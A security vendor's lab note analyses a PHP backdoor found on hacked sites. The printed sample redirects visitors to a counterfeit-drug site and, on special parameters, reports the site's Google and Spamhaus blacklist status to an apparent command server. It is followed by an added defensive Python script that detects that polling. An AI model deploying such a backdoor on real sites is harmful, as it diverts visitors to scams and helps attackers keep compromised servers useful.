Blacklist Monitoring for Hackers and Webmasters

Labs Note

An infected site stays useful to cyber-criminals only as long as it avoids being blacklisted. Traffic drops significantly once a URL appears on Google’s Safe Browsing list, and if the hacked site is used to send out email spam, the success of the spam campaign depends directly on the server not appearing in anti-spam blacklists. That’s why hackers want to know whether the sites they compromised have been blacklisted or not.

Here’s an example of malware that works with Google’s and Spamhaus’s blacklists.


<?php
if ($_GET['mod']) {
  // Mode '0XX' or '00X': ask Google's Safe Browsing diagnostic endpoint about this host.
  if ($_GET['mod'] == '0XX' OR $_GET['mod'] == '00X') {
    $g_sch = file_get_contents('http://www.google.com/safebrowsing/diagnostic?output=jsonp&site=http%3A%2F%2F' . $_SERVER['HTTP_HOST'] . '%2F');
    // The 4th argument receives the number of '"listed"' occurrences; any match means Google flags the site.
    $g_sch = str_replace('"listed"', '', $g_sch, $g_out);
    if ($g_out) {
      header('HTTP/1.1 202');   // 202: blacklisted by Google
      exit;
    }
  }

  // Mode 'X0X' or '00X': query the Spamhaus DBL over DNS (<host>.dbl.spamhaus.org).
  if ($_GET['mod'] == 'X0X' OR $_GET['mod'] == '00X') {
    $sh = gethostbyname($_SERVER['HTTP_HOST'] . '.dbl.spamhaus.org');
    // A 127.0.1.x answer is one of the DBL's "listed" return codes.
    if ($sh == '127.0.1.2' or $sh == '127.0.1.4' or $sh == '127.0.1.5' or
        $sh == '127.0.1.6' or $sh == '127.0.1.102' or $sh == '127.0.1.103' or
        $sh == '127.0.1.104' or $sh == '127.0.1.105' or $sh == '127.0.1.106') {
      header('HTTP/1.1 203');   // 203: blacklisted by Spamhaus
      exit;
    }
  }

  header('HTTP/1.1 201');       // 201: not blacklisted
  exit;
}

// Default behaviour for ordinary visitors: redirect to the pharma spam site.
header('HTTP/1.1 302 Found');
header('Location: hxxp://rx-webmart[.]su');

As you can see, by default this is just web spam malware that redirects visitors to a site selling counterfeit drugs. But if you pass certain parameters to the script, it checks whether the site is blacklisted by Google and/or by Spamhaus (which suggests that the same campaign also involves email spamming). The result is returned as an HTTP status code:

  • 201 – not blacklisted
  • 202 – blacklisted by Google
  • 203 – blacklisted by Spamhaus.org

The use of HTTP status codes instead of human-readable output suggests that this functionality is used by a C&C server that regularly polls blacklist status from all compromised sites.
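The same two mechanisms can be turned around for the defender. The Python below is an added example, not code from the post or from Sucuri: it performs the Spamhaus DBL lookup the malware performs (a DNS A query for `<domain>.dbl.spamhaus.org`) and decodes the 127.0.1.x answer using the meanings Spamhaus documents for those codes, and it scans web-server access-log lines for the backdoor's own polling protocol (a `mod=0XX`, `mod=00X` or `mod=X0X` request answered with 201, 202 or 203), which is how you would spot the C&C checking in. The resolver is injectable so the logic can be exercised offline; the log format is assumed to be the Apache/nginx "combined" format, and the sample log lines are constructed for this example.

```python
"""Defender-side view of the blacklist-polling backdoor (added example)."""
import re
import socket
from typing import Callable, Dict, List, Optional

# DBL return codes checked by the malware, with the meanings Spamhaus documents
# for the dbl.spamhaus.org zone. 127.0.1.255 is not in the malware; it is the
# standard "IP queries prohibited" answer and should never be read as a listing.
DBL_CODES: Dict[str, str] = {
    "127.0.1.2": "spam domain",
    "127.0.1.4": "phish domain",
    "127.0.1.5": "malware domain",
    "127.0.1.6": "botnet C&C domain",
    "127.0.1.102": "abused legit spam",
    "127.0.1.103": "abused spammed redirector domain",
    "127.0.1.104": "abused legit phish",
    "127.0.1.105": "abused legit malware",
    "127.0.1.106": "abused legit botnet C&C",
    "127.0.1.255": "IP queries prohibited",
}

Resolver = Callable[[str], str]


def check_dbl(domain: str, resolve: Resolver = socket.gethostbyname) -> Optional[str]:
    """Return the DBL label for `domain`, or None if it is not listed.

    `resolve` defaults to a real DNS lookup (the gethostbyname() call the
    malware uses); pass a fake to test offline.
    """
    try:
        answer = resolve(f"{domain}.dbl.spamhaus.org")
    except OSError:
        # NXDOMAIN (socket.gaierror is an OSError): not on the list.
        return None
    # Anything outside the documented codes (wildcard DNS, captive portal,
    # broken resolver) is reported as unexpected rather than as a listing.
    return DBL_CODES.get(answer, f"unexpected DBL answer {answer}")


def never_listed(host: str) -> str:
    """Fake resolver (assumed, for offline use) that behaves like NXDOMAIN."""
    raise OSError(f"no such host: {host}")


# Combined log format, reduced to the fields needed here.
_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)
# The three mode strings the backdoor accepts and the three codes it answers with.
POLL_MODES = {"0XX", "00X", "X0X"}
POLL_STATUS = {"201": "not blacklisted",
               "202": "blacklisted by Google",
               "203": "blacklisted by Spamhaus"}


def find_blacklist_polls(log_lines: List[str]) -> List[Dict[str, str]]:
    """Flag log entries that match the C&C polling described in the post.

    A hit needs both halves: a `mod=` query parameter carrying one of the
    three mode strings, and a 201/202/203 status, which a normal site
    practically never returns for a GET. Each hit records who polled and
    what the backdoor told them.
    """
    hits: List[Dict[str, str]] = []
    for line in log_lines:
        m = _LOG_RE.match(line)
        if not m:
            continue
        q = re.search(r"[?&]mod=([^&]+)", m.group("path"))
        if not q or q.group(1) not in POLL_MODES or m.group("status") not in POLL_STATUS:
            continue
        hits.append({"ip": m.group("ip"), "when": m.group("ts"),
                     "mode": q.group(1), "verdict": POLL_STATUS[m.group("status")]})
    return hits


# Constructed sample log (documentation IP ranges, not real pollers).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Jul/2018:03:14:02 +0000] "GET /index.php?mod=00X HTTP/1.1" 202 0 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [10/Jul/2018:03:14:05 +0000] "GET /index.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [11/Jul/2018:03:14:01 +0000] "GET /index.php?mod=X0X HTTP/1.1" 201 0 "-" "curl/7.58.0"',
    '192.0.2.9 - - [11/Jul/2018:09:00:00 +0000] "GET /blog/?mod=theme HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    # Offline demo: a fake resolver returning the "malware domain" code.
    print(check_dbl("example.invalid", resolve=lambda h: "127.0.1.5"))
    print(check_dbl("example.invalid", resolve=never_listed))
    for hit in find_blacklist_polls(SAMPLE_LOG):
        print(hit)
```

Run against a real access log, the second function gives you the polling IPs and schedule (here the same host checks in daily), which is the evidence to pair with cleaning the injected redirect; the first function, called with the default resolver, lets you watch your own domain's DBL status the way the attacker did.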

While this sort of monitoring may be useful to hackers, it’s even more useful to legitimate site owners, who risk their business and reputation if their sites get blacklisted. For them, it is important to be able to investigate and resolve such incidents as soon as possible. That’s why Sucuri Website Antivirus includes monitoring of 10 blacklists (Google Safe Browsing, SpamHaus DBL, Norton Safe Web, PhishTank, Opera, SiteAdvisor, Bitdefender, Yandex, ESET, plus our own Sucuri blacklist). If a website gets blacklisted for any reason, not only do we inform the site owner about it, but we also help clean the site and remove it from the blacklists.
